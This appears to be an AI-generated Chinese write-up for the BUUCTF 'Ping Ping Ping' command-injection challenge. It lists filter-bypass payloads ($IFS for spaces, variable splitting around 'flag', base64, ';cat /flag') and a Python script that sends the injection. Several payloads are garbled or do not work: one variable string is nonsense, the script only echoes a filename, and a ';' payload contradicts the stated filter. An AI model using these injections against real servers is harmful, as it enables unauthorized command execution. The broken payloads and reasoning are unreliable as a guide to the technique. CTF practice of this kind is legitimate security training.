buuctf pingpingping

### BUUCTF Web 题目 'Ping Ping Ping' 的解题思路 #### 背景分析 此题目属于典型的命令注入漏洞利用场景。目标是通过构造特定的 URL 参数，绕过服务器端的安全过滤机制，最终读取到 `flag.php` 文件的内容。 --- #### 已知条件与挑战 1. **URL 结构** 页面提供了一个查询参数 `/ip=`，用于接收 IP 地址并执行 `ping` 命令。 2. **安全过滤规则** - 过滤了常见的命令连接符：`;`, `|`, 和 `&`. - 空格被禁用。 - 特殊字符 `\`, `*`, `<`, `>`, `?` 也被过滤。 - 关键字如 `flag` 或者可能触发敏感操作的字符串也会被拦截。 3. **目标** 绕过上述限制，成功获取 `flag.php` 中的内容。 --- #### 解决方案概述 ##### 方法一：Base64 编码绕过 如果允许上传或者传递编码后的数据，则可以将关键指令进行 Base64 编码后再发送请求。例如： ```plaintext Y2F0IGZsYWcucGhw ``` 该字符串实际上是 `cat flag.php` 的 Base64 表达形式[^1]。将其作为参数的一部分提交后，在服务端解析时可能会自动解码并执行原始命令。 ##### 方法二：使用 `$IFS` 变量替代空格 由于直接输入空格会被阻止，因此可采用 Shell 内置变量 `$IFS` 来实现相同效果。具体做法如下： ```plaintext /?ip=127.0.0.1$(echo${IFS}-n${IFS}index.php) ``` 此处 `${IFS}` 替代了原本需要使用的空白间隔符，而 `-n` 则防止额外换行干扰输出结果[^4]。 ##### 方法三：字符串拼接技术 当某些字母组合受到严格审查时（比如包含单词 “flag”），可以通过拆分重组的方式规避检测。例如下面的例子展示了如何巧妙地避开正则表达式的匹配逻辑： ```plaintext a=index;b=.php;cat$a$b ``` 另外还有更复杂的变形版本可供参考： ```plaintext a=ag.php;cat$IFS9f$l9fl9fla ``` 这种技巧依赖于动态定义局部变量以及灵活运用环境路径完成最终目的[^3]。 --- #### 实际验证过程中的注意事项 - 测试过程中务必注意区分大小写敏感度差异； - 对不同操作系统平台间可能存在细微语法区别保持警惕； - 如果遇到新的未知防御措施，请耐心调试直至找到突破口为止。 --- ### 示例代码片段 以下是基于以上理论构建的一个完整攻击向量实例： ```python import requests url = "http://example.com/ping" payload = "?ip=$(echo${IFS}-n${IFS}flag.php)" headers = {"User-Agent": "Mozilla/5.0"} response = requests.get(url + payload, headers=headers) if response.status_code == 200 and "your_flag_content_here" in response.text: print("[+] Successfully retrieved the FLAG!") else: print("[-] Failed to retrieve the FLAG.") ``` --- #### 总结 通过对多种潜在防护手段的研究学习，我们可以总结出针对此类 CTF 类型赛题的有效应对策略——即充分利用现有工具特性的同时不断探索创新性的解决方案。

我了解你的问题是关于pingpingping的。在题目中，当我们输入127.0.0.1时，会执行ping命令。如果我们想要获取flag，可以尝试以下payloads： - ?ip=127.0.0.1;cat /flag - ?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 这些payloads可以通过传入特定的参数来执行对应的命令，从而获取flag。希望对你有帮助！<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [[GXYCTF 2019]Ping Ping Ping](https://blog.csdn.net/m0_62422842/article/details/124616206)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [[GXYCTF2019]Ping Ping Ping（RCE）](https://blog.csdn.net/weixin_44348894/article/details/105352676)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]